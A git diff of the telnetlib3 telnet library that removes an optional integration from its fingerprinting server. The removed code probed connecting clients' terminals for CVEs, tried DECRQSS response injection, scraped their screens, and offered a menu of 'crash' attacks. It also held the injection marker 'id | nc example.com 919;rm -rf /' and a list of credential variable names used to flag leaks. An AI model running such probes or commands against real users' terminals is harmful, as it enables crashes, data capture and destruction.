- _writer.write(_ALT_SCREEN_OFF)
- await _writer.drain()
- alt_clean = _UNKNOWN_CKSUM_RE.sub(" ", alt)
-
- result: dict[str, Any] = {
- "decrqcra": True,
- "screen_0": normal_clean,
- "screen_0_with_unknown_checksums": normal,
- "rows": rows,
- "cols": cols,
- }
-
- if normal_clean != alt_clean:
- result["screen_1"] = alt_clean
- result["screen_1_with_unknown_checksums"] = alt
-
- return result
-
-
async def fingerprinting_server_shell(
reader: Union[TelnetReader, TelnetReaderUnicode],
writer: Union[TelnetWriter, TelnetWriterUnicode],
@@ -1506,21 +1178,6 @@ async def fingerprinting_server_shell(
"""
from .server_pty_shell import pty_shell
- async def _handle_telnet_attack(_writer: TelnetWriterUnicode, attack_key: str) -> None:
- """Execute a telnet-layer attack by key."""
- if not _HAS_TV_DETECT:
- return
- from .attacks import ATTACKS
-
- attack = ATTACKS.get(attack_key)
- if not attack:
- return
- handler = attack.get("handler")
- if handler == "telnet_new_environ_user":
- logger.info("executing telnet-layer attack: NEW_ENVIRON USER")
- _writer._send_environ_batch(["USER"])
- await _writer.drain()
-
writer = cast(TelnetWriterUnicode, writer)
probe_results, probe_time = await _run_probe(writer, verbose=False)
@@ -1532,12 +1189,15 @@ async def _handle_telnet_attack(_writer: TelnetWriterUnicode, attack_key: str) -
# Collect fingerprint data BEFORE disabling LINEMODE, so that
# _collect_slc_tab sees remote_option[LINEMODE] as True.
session_fp = _build_session_fingerprint(writer, probe_results, probe_time)
- filepath = _save_fingerprint_data(writer, probe_results, probe_time, session_fp)
- # Store TTYPE for connection_lost logging
- writer._tv_term_label = repr( # type: ignore[attr-defined]
- (writer.get_extra_info("TERM") or "unknown").lower()
- )
+ # Detect telnet option re-negotiation loops (clients that would WILL/WONT
+ # options they have already settled).
+ looped = await probe_client_loop_detection(writer, probe_results, timeout=_PROBE_TIMEOUT)
+ if looped:
+ logger.debug("probe: %d looped options: %s", len(looped), looped)
+ else:
+ logger.debug("probe: no looped options detected")
+ filepath = _save_fingerprint_data(writer, probe_results, probe_time, session_fp, looped=looped)
# Disable LINEMODE if it was negotiated - stay in kludge mode (SGA+ECHO)
# for PTY shell. LINEMODE causes echo loops with GNU telnet when running
@@ -1562,74 +1222,8 @@ async def _handle_telnet_attack(_writer: TelnetWriterUnicode, attack_key: str) -
break
try:
- if filepath is not None and _HAS_TV_DETECT and not is_mud_client:
- # Run CVE, injection, STS, and DECRQCRA probes over the telnet
- # connection before launching the PTY subprocess.
- send_recv = _make_send_recv(reader, writer)
- logger.debug("probe: CVE vulnerabilities")
- cve_results = await _tv_probe_cves(send_recv)
- logger.debug("probe: CVE done, %d results", len(cve_results))
-
- logger.debug("probe: injection (DECRQSS)")
- injection_result = await _tv_probe_injection(send_recv)
- logger.debug(
- "probe: injection done, result=%s",
- injection_result.get("injectable") if injection_result else None,
- )
-
- rows = writer.get_extra_info("rows") or 25
- cols = writer.get_extra_info("cols") or 80
- logger.debug("probe: STS screen scrape")
- sts_result = await _tv_probe_sts(send_recv, rows=rows, cols=cols)
- logger.debug(
- "probe: STS done, result=%s", sts_result.get("sts") if sts_result else None
- )
-
- scrape_result: Optional[dict[str, Any]] = None
-
- if sts_result and sts_result.get("sts"):
- logger.debug("probe: STS screen scrape content")
- try:
- scrape_result = await asyncio.wait_for(
- scrape_screen_sts(reader, writer, rows, cols), timeout=2.0
- )
- except asyncio.TimeoutError:
- logger.info("probe: STS screen scrape timed out")
- scrape_result = None
-
- logger.debug("probe: DECRQCRA")
- decrqcra_result = await _tv_probe_decrqcra(send_recv)
- logger.debug(
- "probe: DECRQCRA done, result=%s",
- decrqcra_result.get("decrqcra") if decrqcra_result else None,
- )
- if not scrape_result and decrqcra_result and decrqcra_result.get("decrqcra"):
- logger.debug("probe: DECRQCRA screen scrape")
- try:
- scrape_result = await asyncio.wait_for(
- scrape_screen(reader, writer, rows, cols), timeout=2.0
- )
- except asyncio.TimeoutError:
- logger.info("probe: DECRQCRA screen scrape timed out")
- scrape_result = None
-
- with open(filepath, encoding="utf-8") as f:
- data = json.load(f)
- data["cve_results"] = cve_results
- if injection_result:
- data["injection_probe"] = injection_result
- if sts_result:
- data["sts_probe"] = sts_result
- if decrqcra_result:
- data["decrqcra_probe"] = decrqcra_result
- if scrape_result:
- data["screen-scrape"] = scrape_result
- elif decrqcra_result:
- data["screen-scrape"] = {"decrqcra": decrqcra_result.get("decrqcra", False)}
- _atomic_json_write(filepath, data)
-
if filepath is not None:
- # Switch to latin-1 for PTY shell — lossless byte passthrough
+ # Switch to latin-1 for PTY shell, lossless byte passthrough
# required for binary protocols like ZMODEM. Done after probing
# so that ucs-detect and other Unicode probes use UTF-8.
if (writer.get_extra_info("TERM") or "").lower() == "syncterm":
@@ -1644,12 +1238,12 @@ async def _handle_telnet_attack(_writer: TelnetWriterUnicode, attack_key: str) -
writer._protocol._extra["IPADDRESS"] = peername[0]
if client_has_sga and not is_mud_client:
- os.environ["TV_DETECT_TERMINAL"] = "1"
+ os.environ["TELNETLIB3_INTERACTIVE_TERMINAL"] = "1"
else:
- os.environ.pop("TV_DETECT_TERMINAL", None)
+ os.environ.pop("TELNETLIB3_INTERACTIVE_TERMINAL", None)
post_script = FINGERPRINT_POST_SCRIPT or "telnetlib3.fingerprinting_display"
- exit_code = await pty_shell(
+ await pty_shell(
reader,
writer,
sys.executable,
@@ -1657,11 +1251,6 @@ async def _handle_telnet_attack(_writer: TelnetWriterUnicode, attack_key: str) -
raw_mode=True,
)
- # Exit code 100+ signals a telnet-layer attack request
- if exit_code is not None and exit_code >= 100:
- attack_key = str(exit_code - 100)
- await _handle_telnet_attack(writer, attack_key)
-
writer.close()
else:
writer.close()
@@ -1709,22 +1298,11 @@ def fingerprint_server_main() -> None:
def _add_extra_args(parser: argparse.ArgumentParser) -> None:
parser.add_argument("--data-dir", default=DATA_DIR, help="directory for fingerprint data")
- parser.add_argument(
- "--passkey",
- default="",
- help="passkey for tv-detect vulnerability access (KEY=VALUE format)",
- )
args = parse_server_args(extra_args_fn=_add_extra_args)
DATA_DIR = args.pop("data_dir")
os.environ["TELNETLIB3_DATA_DIR"] = DATA_DIR
- passkey = args.pop("passkey", "") or os.environ.get("TV_DETECT_PASSKEY", "")
- if passkey:
- from . import fingerprinting_display # noqa: PLC0415
-
- fingerprinting_display._tv_passkey = passkey
-
if args["shell"] is _config.shell:
args["shell"] = fingerprinting_server_shell
args["protocol_factory"] = FingerprintingServer
diff --git a/telnetlib3/fingerprinting_display.py b/telnetlib3/fingerprinting_display.py
index 788a78af..9f64e0c2 100644
--- a/telnetlib3/fingerprinting_display.py
+++ b/telnetlib3/fingerprinting_display.py
@@ -16,7 +16,6 @@
import termios
import tempfile
import textwrap
-import warnings
import functools
import contextlib
import subprocess
@@ -26,27 +25,6 @@
import blessed
import prettytable
-# third-party (optional)
-try:
- from tv_detect.attacks import PASSKEY as _TV_PASSKEY
- from tv_detect.attacks import SEVERITY_COLOR
- from tv_detect.attacks import DECRQSS_INJECT_MARKER as _DECRQSS_INJECT_MARKER
- from tv_detect.execute import prompt_keys as _tv_prompt_keys
- from tv_detect.execute import execute_attack as _tv_execute_attack
- from tv_detect.execute import verify_passkey as _tv_verify_passkey
- from tv_detect.execute import try_decrqss_injection
- from tv_detect.execute import get_vulnerability_rows as _tv_vuln_rows
- from tv_detect.execute import get_attacks_for_software as _tv_get_attacks
-
- _HAS_TV_DETECT = True
-except ImportError:
- _HAS_TV_DETECT = False
- _TV_PASSKEY = ""
-
-#: Active passkey for tv-detect vulnerability gating.
-#: Set from client NEW-ENVIRON, REPL input, or ``--passkey`` CLI argument.
-_tv_passkey: str = ""
-
# local
from ._paths import _atomic_json_write # noqa: E402
from .accessories import PATIENCE_MESSAGES # noqa: E402
@@ -115,14 +93,14 @@ def _log_identification(data: Dict[str, Any], names: Dict[str, str]) -> None:
def _syslog_info(msg: str) -> None:
- """Write an INFO-level message to syslog with tv-detect-telnet ident."""
+ """Write an INFO-level message to syslog with telnetlib3-fingerprint ident."""
import syslog
import inspect
frame = inspect.currentframe()
caller = frame.f_back if frame else None
lineno = caller.f_lineno if caller else 0
- syslog.openlog("tv-detect-telnet", syslog.LOG_PID)
+ syslog.openlog("telnetlib3-fingerprint", syslog.LOG_PID)
syslog.syslog(syslog.LOG_INFO, f"INFO fingerprinting_display.py:{lineno} {msg}")
@@ -156,7 +134,7 @@ def _styled_input(term: "blessed.Terminal", prompt: str) -> str:
_flush_input(term)
# MUD clients: simple line input, no cursor tricks
- if os.environ.get("TV_DETECT_TERMINAL") != "1":
+ if os.environ.get("TELNETLIB3_INTERACTIVE_TERMINAL") != "1":
echo(prompt)
return _read_line(term).strip()
@@ -228,7 +206,7 @@ def _run_ucs_detect() -> Optional[Dict[str, Any]]:
"TERMINFO_DIRS",
)
env = {k: os.environ[k] for k in _PASSTHROUGH_KEYS if k in os.environ}
- env["UCS_DETECT_SYSLOG"] = "tv-detect-telnet"
+ env["UCS_DETECT_SYSLOG"] = "telnetlib3-fingerprint"
try:
try:
@@ -628,101 +606,6 @@ def _build_telnet_rows(term: "blessed.Terminal", data: Dict[str, Any]) -> List[T
return pairs
-#: Credential / secret env vars -- immediate red flag if leaked over telnet.
-_CRITICAL_ENV_VARS = frozenset(
- {
- # AWS credentials
- "AWS_ACCESS_KEY_ID",
- "AWS_SECRET_ACCESS_KEY",
- "AWS_SESSION_TOKEN",
- # SSH network topology -- reveals internal IPs / jump-host identity
- "SSH_REMOTE_HOST",
- "SSH_REMOTE_IP",
- # API keys / tokens
- "GITHUB_TOKEN",
- "GH_TOKEN",
- "GITLAB_TOKEN",
- "GL_TOKEN",
- "ANTHROPIC_API_KEY",
- "OPENAI_API_KEY",
- "STRIPE_SECRET_KEY",
- "SENDGRID_API_KEY",
- "HEROKU_API_KEY",
- "NPM_TOKEN",
- "SLACK_TOKEN",
- "TWILIO_AUTH_TOKEN",
- # Database credentials
- "DATABASE_URL",
- "PGPASSWORD",
- "MYSQL_PWD",
- "REDIS_URL",
- # Azure / GCP
- "AZURE_CLIENT_SECRET",
- "GOOGLE_APPLICATION_CREDENTIALS",
- # Generic secret patterns
- "SECRET_KEY",
- "API_KEY",
- "PRIVATE_KEY",
- "JWT_SECRET",
- # Docker credentials
- "DOCKER_PASSWORD",
- }
-)
-
-#: Vars that are useful for a telnet session -- everything else is oversharing.
-_USEFUL_ENV_VARS = frozenset(
- {
- "TERM",
- "TERM_PROGRAM",
- "TERM_PROGRAM_VERSION",
- "COLUMNS",
- "LINES",
- "COLORTERM",
- "LANG",
- "LC_ALL",
- "LC_CTYPE",
- "DISPLAY",
- "USER",
- "LOGNAME",
- "EDITOR",
- "VISUAL",
- "IPADDRESS",
- # MUD client MTTS/MNES capabilities (desirable to share)
- "256_COLORS",
- "ANSI",
- "CHARSET",
- "CLIENT_NAME",
- "CLIENT_VERSION",
- "MTTS",
- "OSC_COLOR_PALETTE",
- "OSC_HYPERLINKS",
- "OSC_HYPERLINKS_MENU",
- "OSC_HYPERLINKS_PROMPT",
- "OSC_HYPERLINKS_SEND",
- "OSC_HYPERLINKS_STYLE_BASIC",
- "OSC_HYPERLINKS_STYLE_STATES",
- "OSC_HYPERLINKS_TOOLTIP",
- "SCREEN_READER",
- "TERMINAL_TYPE",
- "TLS",
- "TRUECOLOR",
- "UTF-8",
- "VT100",
- "WORD_WRAP",
- }
-)
-
-
-def _osc8(url: str, text: str) -> str:
- """Format an OSC 8 terminal hyperlink."""
- return f"\x1b]8;;{url}\x1b\\{text}\x1b]8;;\x1b\\"
-
-
-_CVE_2005_0488_URL = "https://nvd.nist.gov/vuln/detail/CVE-2005-0488"
-_CVE_2005_1205_URL = "https://nvd.nist.gov/vuln/detail/CVE-2005-1205"
-_DECRQCRA_REF_URL = "https://dgl.cx/2023/09/ansi-terminal-security"
-
-
def _extract_software_name(data: Dict[str, Any]) -> str:
"""
Extract terminal software name from fingerprint data.
@@ -739,151 +622,11 @@ def _extract_software_name(data: Dict[str, Any]) -> str:
return extra.get("TERM") or ""
-def _extract_passkey(data: Dict[str, Any]) -> str:
- """
- Extract passkey from client NEW-ENVIRON data.
-
- Checks the env var from the telnet session's extra info
- against the tv-detect passkey format.
-
- :returns: Passkey string in ``KEY=VALUE`` format, or empty string.
- """
- if not _HAS_TV_DETECT:
- return ""
- telnet_probe = data.get("telnet-probe", {})
- extra = telnet_probe.get("session_data", {}).get("extra", {})
- envvar, _, expected = _TV_PASSKEY.partition("=")
- value = extra.get(envvar, "")
- if value == expected:
- return str(_TV_PASSKEY)
- return ""
-
-
-def _build_vulnerabilities_rows(
- term: "blessed.Terminal", data: Dict[str, Any]
-) -> List[Tuple[str, str]]:
- """
- Build (key, value) tuples for the vulnerabilities table.
-
- Only vulnerabilities that are actually detected are shown. CVE identifiers are on the left,
- descriptions with the affected protocol/sequence in parentheses on the right.
- """
- high: List[Tuple[str, str]] = []
- medium: List[Tuple[str, str]] = []
- low: List[Tuple[str, str]] = []
-
- _high = term.bold_firebrick1
- _med = term.darkorange
- _low = term.yellowgreen
-
- # -- HIGH --
-
- # DECRQSS injection
- injection = data.get("injection_probe")
- if injection and injection.get("injectable"):
- ref = _osc8(_DECRQCRA_REF_URL, "Leadbeater 2023")
- high.append((ref, f"{_high('[HIGH]')} {_high('Response injection (DECRQSS)')}"))
-
- # Terminal-specific vulnerabilities from tv-detect
- if _HAS_TV_DETECT:
- sw_name = _extract_software_name(data)
- _sev_fn = {"HIGH": _high, "MEDIUM": _med, "LOW": _low}
- for ref, sev, name in _tv_vuln_rows(sw_name, passkey=_tv_passkey):
- fn = _sev_fn.get(sev, _low)
- bucket = {"HIGH": high, "MEDIUM": medium, "LOW": low}.get(sev, low)
- bucket.append((ref, f"{fn(f'[{sev}]')} {fn(name)}"))
-
- # -- MEDIUM --
-
- # NEW_ENVIRON oversharing
- telnet_probe = data.get("telnet-probe", {})
- session_data = telnet_probe.get("session_data", {})
- extra = session_data.get("extra", {})
- env_keys = [k for k in extra if k == k.upper() and extra[k]]
- critical = sorted(k for k in env_keys if k in _CRITICAL_ENV_VARS)
- overshared = sorted(
- k for k in env_keys if k not in _CRITICAL_ENV_VARS and k not in _USEFUL_ENV_VARS
- )
- cve_refs = (
- _osc8(_CVE_2005_0488_URL, "CVE-2005-0488")
- + ", "
- + _osc8(_CVE_2005_1205_URL, "CVE-2005-1205")
- )
- if critical:
- high.append(
- (
- cve_refs,
- f"{_high('[HIGH]')} {_high('LEAKED: ' + ', '.join(critical) + ' (NEW_ENVIRON)')}",
- )
- )
- if overshared:
- low.append(
- (
- cve_refs if not critical else "",
- f"{_low('[LOW]')} "
- f"{_low('Oversharing: ' + ', '.join(overshared) + ' (NEW_ENVIRON)')}",
- )
- )
-
- # CVE probes from vt-houdini
- cve_results = data.get("cve_results")
- if not cve_results:
- terminal_probe = data.get("terminal-probe", {})
- cve_results = (
- terminal_probe.get("session_data", {})
- .get("terminal_results", {})
- .get("cve_results", {})
- )
- for cve_id, result in sorted(cve_results.items()):
- if result and result is not False:
- url = f"https://nvd.nist.gov/vuln/detail/{cve_id}"
- label = _osc8(url, cve_id)
- medium.append((label, f"{_med('[MEDIUM]')} {_med('Vulnerable')}"))
-
- # -- LOW (screen scraping) --
-
- sts_probe = data.get("sts_probe")
- scrape = data.get("screen-scrape")
- if sts_probe and sts_probe.get("sts"):
- ref = _osc8(_DECRQCRA_REF_URL, "Leadbeater 2023")
- if scrape and scrape.get("method") == "sts":
- low.append((ref, f"{_low('[LOW]')} {_low('Screen scraping (STS)')}"))
- else:
- low.append((ref, f"{_low('[LOW]')} {_low('Screen scraping (STS) supported')}"))
-
- decrqcra_probe = data.get("decrqcra_probe")
- if not decrqcra_probe and scrape:
- decrqcra_probe = scrape
- if decrqcra_probe:
- ref = (
- _osc8(_DECRQCRA_REF_URL, "Leadbeater 2023")
- if not (sts_probe and sts_probe.get("sts"))
- else ""
- )
- if decrqcra_probe.get("decrqcra"):
- if scrape and (scrape.get("screen_0") or scrape.get("screen_1")):
- low.append((ref, f"{_low('[LOW]')} {_low('Screen scraping (DECRQCRA)')}"))
- else:
- low.append((ref, f"{_low('[LOW]')} {_low('Screen scraping (DECRQCRA) supported')}"))
- elif scrape and scrape.get("method") != "sts" and "decrqcra" not in (scrape or {}):
- low.append((ref, f"{_low('[LOW]')} {_low('Screen scraping (DECRQCRA) supported')}"))
-
- return high + medium + low
-
-
def _make_terminal(**kwargs: Any) -> "blessed.Terminal":
- """Create a blessed Terminal, falling back to ``ansi`` on setupterm failure."""
+ """Create a blessed Terminal."""
from blessed import Terminal
- with warnings.catch_warnings(record=True) as caught:
- warnings.simplefilter("always")
- term = Terminal(**kwargs)
- if any("setupterm" in str(w.message) for w in caught):
- kwargs["kind"] = "ansi"
- with warnings.catch_warnings():
- warnings.simplefilter("ignore")
- term = Terminal(**kwargs)
- return term
+ return Terminal(**kwargs)
@contextlib.contextmanager
@@ -1022,14 +765,6 @@ def make_table(title: str, pairs: List[Tuple[str, str]]) -> str:
if telnet_rows:
table_strings.append(make_table("Telnet", telnet_rows))
- vuln_rows = _build_vulnerabilities_rows(term, data)
- if vuln_rows:
- vuln_count = len(vuln_rows)
- vuln_title = "Vulnerabilities"
- if vuln_count:
- vuln_title += f" ({vuln_count})"
- table_strings.append(make_table(vuln_title, vuln_rows))
-
if not table_strings:
return False
@@ -1311,7 +1046,7 @@ def _color_name(name: str) -> str:
if username:
title = f"{username} - {title}"
# Only set xterm title for real terminal emulators, not MUD clients.
- if os.environ.get("TV_DETECT_TERMINAL") == "1":
+ if os.environ.get("TELNETLIB3_INTERACTIVE_TERMINAL") == "1":
echo(f"\x1b]0;{title}\x1b\\")
if lines:
@@ -1371,15 +1106,8 @@ def _repl_prompt(term: "blessed.Terminal", software_name: str = "") -> None:
lines = [
f"{bk(term, 't')}ERM or TE{bk(term, 'l')}NET details?", # codespell:ignore te
f"{bk(term, 's')}ummarize, {bk(term, 'u')}pdate, or s{bk(term, 'h')}ow DB",
+ f"{bk(term, 'q')}uit",
]
- if _HAS_TV_DETECT:
- pk = _tv_prompt_keys(software_name=software_name, passkey=_tv_passkey)
- if pk["available"]:
- lines.append(f"{bk(term, 'v')}ulnerabilities, {bk(term, 'q')}uit")
- else:
- lines.append(f"{bk(term, 'q')}uit")
- else:
- lines.append(f"{bk(term, 'q')}uit")
legend = "\r\n".join(lines)
echo(f"\r{term.clear_eos}{term.normal}{legend}\r\n: ")
@@ -1409,10 +1137,6 @@ def _read_line(term: "blessed.Terminal") -> str:
echo(ch)
-if not _HAS_TV_DETECT:
- _DECRQSS_INJECT_MARKER = "id | nc example.com 919;rm -rf /" # noqa: F811
-
-
def _paginate(term: "blessed.Terminal", text: str, **_kw: Any) -> None:
"""Display text."""
for line in text.split("\n"):
@@ -1559,90 +1283,6 @@ def _filter_telnet_detail(detail: Optional[Dict[str, Any]]) -> Optional[Dict[str
return result
-def _vuln_menu(term: "blessed.Terminal", software_name: str = "") -> Optional[str]:
- """
- Show vulnerability attack menu, using tv-detect.
-
- When the terminal is a known target, show only matching attacks. When unknown, show all attacks
- so the user can try any of them.
- """
- if not _HAS_TV_DETECT:
- return None
- echo = functools.partial(print, end="", flush=True)
- available = _tv_get_attacks("", passkey=_tv_passkey)
- if not available:
- echo(f"\r\n{term.bold('No attacks available for this terminal.')}\r\n")
- return None
- from tv_detect.attacks import VULN_WARNING, PRICING_MESSAGE
-
- echo(f"\r\n{term.bold_gold1(VULN_WARNING)}\r\n\r\n")
- authorized = _tv_verify_passkey(_tv_passkey)
- max_sev = max(len(v["severity"]) for v in available.values())
- max_id = max(len(k) for k in available)
- for key in sorted(available, key=int):
- attack = available[key]
- sev = attack["severity"]
- color_fn = getattr(term, SEVERITY_COLOR.get(sev, "normal"))
- sev_str = color_fn(f"[{sev:^{max_sev}}]")
- id_str = key.rjust(max_id)
- target = attack.get("target", "")
- target_str = f" ({target})" if target else ""
- if attack.get("passkey_limited") and not authorized:
- echo(
- f" ({term.bold(id_str)}) {sev_str}"
- f" {term.bold_gold1(PRICING_MESSAGE)}{target_str}\r\n"
- )
- else:
- echo(f" ({term.bold(id_str)}) {sev_str} {attack['name']}{target_str}\r\n")
- echo("\r\n: ")
- key = _read_line(term).strip()
- if key in available:
- return key
- return None
-
-
-def _execute_crash(
- term: "blessed.Terminal", key: str, software_name: str = "", ip: str = "unknown"
-) -> None:
- """Execute a vulnerability attack by key, delegating to tv-detect."""
- if not _HAS_TV_DETECT:
- return
- echo = functools.partial(print, end="", flush=True)
- client_label = f"Client {ip} {repr(software_name)}" if software_name else f"Client {ip}"
- available = _tv_get_attacks("", passkey=_tv_passkey)
- attack = available.get(key, {})
- handler = attack.get("handler", "")
-
- # Telnet-layer attacks can't be executed from the PTY subprocess.
- # Exit with a special code so the server handles it after pty_shell.
- if handler == "telnet_new_environ_user":
- _syslog_info(f"{client_label} selects VULN-#{key} (telnet-layer)")
- name = attack.get("name", "unknown")
- echo(f"\r\n{term.bold_firebrick1('Crash')}: {name}{term.clear_eol}\r\n")
- if note := attack.get("note"):
- echo(f" {term.bold_black(note)}{term.clear_eol}\r\n")
- echo(f"{term.bold('Sending...')}{term.clear_eol}\r\n")
- if key.isdigit() and 1 <= int(key) <= 99:
- sys.exit(100 + int(key))
- return
-
- result = _tv_execute_attack(key, software_name="", passkey=_tv_passkey)
- if result.get("executed"):
- _syslog_info(f"{client_label} selects VULN-#{key} (permitted)")
- # Only reset screen for raw sequence payloads that may move the cursor;
- # handler-based attacks (ZMODEM, kitty, etc) manage their own output.
- if not attack.get("handler"):
- echo(f"{term.home}{term.clear_eos}")
- name = result.get("attack_name", "unknown")
- echo(f"\r\n{term.bold_firebrick1('Crash')}: {name}{term.clear_eol}\r\n")
- if note := result.get("note"):
- echo(f" {term.bold_black(note)}{term.clear_eol}\r\n")
- echo(f"{term.bold('Sent.')} The client may have crashed.{term.clear_eol}\r\n")
- elif error := result.get("error"):
- _syslog_info(f"{client_label} selects VULN-#{key} (denied)")
- echo(f"\r\n{term.bold_gold1(error)}\r\n")
-
-
def _show_detail(term: "blessed.Terminal", data: Dict[str, Any], section: str) -> None:
"""Show detailed JSON for a fingerprint section with pagination."""
if section == "terminal":
@@ -1773,16 +1413,9 @@ def _fingerprint_repl(
names: Optional[Dict[str, str]] = None,
) -> None:
"""Interactive REPL for exploring fingerprint data."""
- global _tv_passkey
ip = _client_ip(data)
software_name = _extract_software_name(data)
- # Check for passkey from client NEW-ENVIRON
- if _HAS_TV_DETECT and not _tv_passkey:
- env_passkey = _extract_passkey(data)
- if env_passkey:
- _tv_passkey = env_passkey
-
_commands = {
"q": "logoff",
"t": "terminal-detail",
@@ -1792,53 +1425,17 @@ def _fingerprint_repl(
"h": "database",
"\x0c": "refresh",
}
- if _HAS_TV_DETECT:
- _commands["v"] = "vulnerabilities"
db_cache = None
- decrqss_tried = False
-
- # Check if CVE-2008-2383 was previously detected as vulnerable
- cve_results = data.get("cve_results", {})
- decrqss_vulnerable = bool(cve_results.get("CVE-2008-2383"))
while True:
_repl_prompt(term, software_name=software_name)
while term.inkey(timeout=0):
pass
- if _HAS_TV_DETECT and decrqss_vulnerable and not decrqss_tried:
- decrqss_tried = True
- if try_decrqss_injection():
- echo(
- f"{term.bold_red}{_DECRQSS_INJECT_MARKER}{term.normal}\r\n"
- f"{term.bold_red}^^ injected via CVE-2008-2383 DECRQSS"
- f" echoback{term.normal}\r\n\r\n"
- )
- logger.info("%s: DECRQSS injection demonstrated", ip)
- import select
-
- while select.select([sys.stdin.fileno()], [], [], 0.2)[0]:
- os.read(sys.stdin.fileno(), 4096)
- while term.inkey(timeout=0):
- pass
- continue
-
raw_input = _read_line(term).strip()
cmd = raw_input.lower()
- # Accept passkey entry: "passkey=USER=jEffREYtAblES"
- if _HAS_TV_DETECT and raw_input.lower().startswith("passkey="):
- candidate = raw_input[len("passkey=") :]
- if _tv_verify_passkey(candidate):
- _tv_passkey = candidate
- logger.info("%s: passkey accepted", ip)
- echo(f"\r\n{term.bold_green('Passkey accepted.')}\r\n")
- else:
- logger.info("%s: passkey rejected", ip)
- echo(f"\r\n{term.bold_red('Invalid passkey.')}\r\n")
- continue
-
if not cmd:
echo("\r: ")
continue
@@ -1871,10 +1468,6 @@ def _fingerprint_repl(
_prompt_fingerprint_identification(term, data, filepath, _names)
names = _load_fingerprint_names()
seen_counts = _build_seen_counts(data, names, term)
- elif cmd == "v" and _HAS_TV_DETECT:
- choice = _vuln_menu(term, software_name=software_name)
- if choice:
- _execute_crash(term, choice, software_name=software_name, ip=ip)
elif cmd == "\x0c":
echo(term.normal + term.clear)
_display_compact_summary(data, term)
@@ -1973,7 +1566,9 @@ def _probe_terminal(filepath: str, data: Dict[str, Any]) -> Optional[str]:
:returns: Updated filepath (may change if terminal hash moves it).
"""
- term = _make_terminal()
+ from blessed._capabilities import TermcapResponse
+
+ term = _make_terminal(_xtgettcap_data=TermcapResponse(supported=False))
flushed = term.flushinp()
if flushed and flushed.strip():
_syslog_info(f"pre-probe flushed {len(flushed)} bytes: {repr(flushed)}")
@@ -1981,7 +1576,7 @@ def _probe_terminal(filepath: str, data: Dict[str, Any]) -> Optional[str]:
_atomic_json_write(filepath, data)
# Skip terminal probing for MUD/line-mode clients
- if os.environ.get("TV_DETECT_TERMINAL") != "1":
+ if os.environ.get("TELNETLIB3_INTERACTIVE_TERMINAL") != "1":
return filepath
if "screen-scrape" not in data:
@@ -2031,20 +1626,18 @@ def _process_client_fingerprint(filepath: str, data: Dict[str, Any]) -> None:
_setup_term_environ(data)
- # Extract passkey from client NEW-ENVIRON if not already set
- global _tv_passkey
- if _HAS_TV_DETECT and not _tv_passkey:
- env_passkey = _extract_passkey(data)
- if env_passkey:
- _tv_passkey = env_passkey
-
try:
import blessed # noqa: F401
except ImportError:
print(json.dumps(data, indent=2, sort_keys=True))
return
- term = _make_terminal()
+ kwargs: Dict[str, Any] = {}
+ if os.environ.get("TELNETLIB3_INTERACTIVE_TERMINAL") != "1":
+ from blessed._capabilities import TermcapResponse
+
+ kwargs["_xtgettcap_data"] = TermcapResponse(supported=False)
+ term = _make_terminal(**kwargs)
names = _load_fingerprint_names()
seen_counts = _build_seen_counts(data, names, term)
diff --git a/telnetlib3/server.py b/telnetlib3/server.py
index 9df6e120..a722e349 100755
--- a/telnetlib3/server.py
+++ b/telnetlib3/server.py
@@ -919,6 +919,24 @@ def _negotiate_echo(self) -> None:
self._echo_negotiated = True
+def _enqueue_client(server: "Server", protocol: server_base.BaseServer) -> None:
+ """
+ Push a completed protocol onto the server's client queue.
+
+ Discards the oldest entry when the bounded queue is full so that
+ long-running servers (which may never call
+ :meth:`Server.wait_for_client`) do not accumulate unbounded memory.
+ """
+ try:
+ server._new_client.put_nowait(protocol)
+ except asyncio.QueueFull:
+ try:
+ server._new_client.get_nowait()
+ except asyncio.QueueEmpty:
+ pass
+ server._new_client.put_nowait(protocol)
+
+
class Server:
"""
Telnet server that tracks connected clients.
@@ -931,7 +949,10 @@ def __init__(self, server: Optional[asyncio.Server]) -> None:
"""Initialize wrapper around asyncio.Server."""
self._server: Optional[asyncio.Server] = server
self._protocols: List[server_base.BaseServer] = []
- self._new_client: asyncio.Queue[server_base.BaseServer] = asyncio.Queue()
+ # Bounded queue prevents unbounded memory growth on long-running
+ # servers where wait_for_client() is never called. The capacity
+ # (1000) is far beyond any realistic wait_for_client() drain rate.
+ self._new_client: asyncio.Queue[server_base.BaseServer] = asyncio.Queue(maxsize=1000)
def close(self) -> None:
"""Close the server, stop accepting new connections, and close all clients."""
@@ -985,12 +1006,13 @@ async def wait_for_client(self) -> server_base.BaseServer:
def _register_protocol(self, protocol: asyncio.Protocol) -> None:
"""Register a new protocol instance (called by factory)."""
+ # Prune dead protocols to prevent unbounded memory growth on
+ # long-running servers handling many short-lived connections.
+ self._protocols = [p for p in self._protocols if not getattr(p, "_closing", False)]
self._protocols.append(protocol) # type: ignore[arg-type]
- # Only register callbacks if protocol has the required waiters
- # (custom protocols like plain asyncio.Protocol won't have these)
if hasattr(protocol, "_waiter_connected"):
protocol._waiter_connected.add_done_callback(
- lambda f, p=protocol: self._new_client.put_nowait(p) if not f.cancelled() else None
+ lambda f, p=protocol: _enqueue_client(self, p) if not f.cancelled() else None
)
diff --git a/telnetlib3/server_fingerprinting.py b/telnetlib3/server_fingerprinting.py
index 003f6705..da401252 100644
--- a/telnetlib3/server_fingerprinting.py
+++ b/telnetlib3/server_fingerprinting.py
@@ -33,9 +33,13 @@
from . import fingerprinting as _fps
from ._paths import _atomic_json_write
from .telopt import (
+ DO,
+ IAC,
VAR,
+ ECHO,
MSSP,
NAWS,
+ WILL,
LFLOW,
TTYPE,
VALUE,
@@ -67,6 +71,12 @@
# in ``server_requested`` (what the server sent DO for).
_CLIENT_ONLY_WILL = frozenset({TTYPE, TSPEED, NAWS, XDISPLOC, NEW_ENVIRON, LFLOW, LINEMODE, SNDLOC})
+# Options probed in the wrong direction to detect role-unaware servers.
+# A server should never WILL these (they describe client-side properties).
+_WRONG_DIRECTION_DO = frozenset({NAWS, TTYPE})
+# A server should never DO these (they describe server-side behaviour).
+_WRONG_DIRECTION_WILL = frozenset({ECHO})
+
_BANNER_MAX_BYTES = 65536
_NEGOTIATION_SETTLE = 0.5
_BANNER_WAIT = 3.0
@@ -591,11 +601,17 @@ async def _fingerprint_session(
if writer.is_closing():
probe_results: dict[str, Any] = {}
probe_time = 0.0
+ wrong_dir_results: dict[str, str] = {}
+ looped_options: list[str] = []
else:
probe_time = time.time()
probe_results = await probe_server_capabilities(
writer, scan_type=scan_type, timeout=_PROBE_TIMEOUT
)
+ wrong_dir_results = await probe_server_wrong_direction(writer, timeout=_PROBE_TIMEOUT)
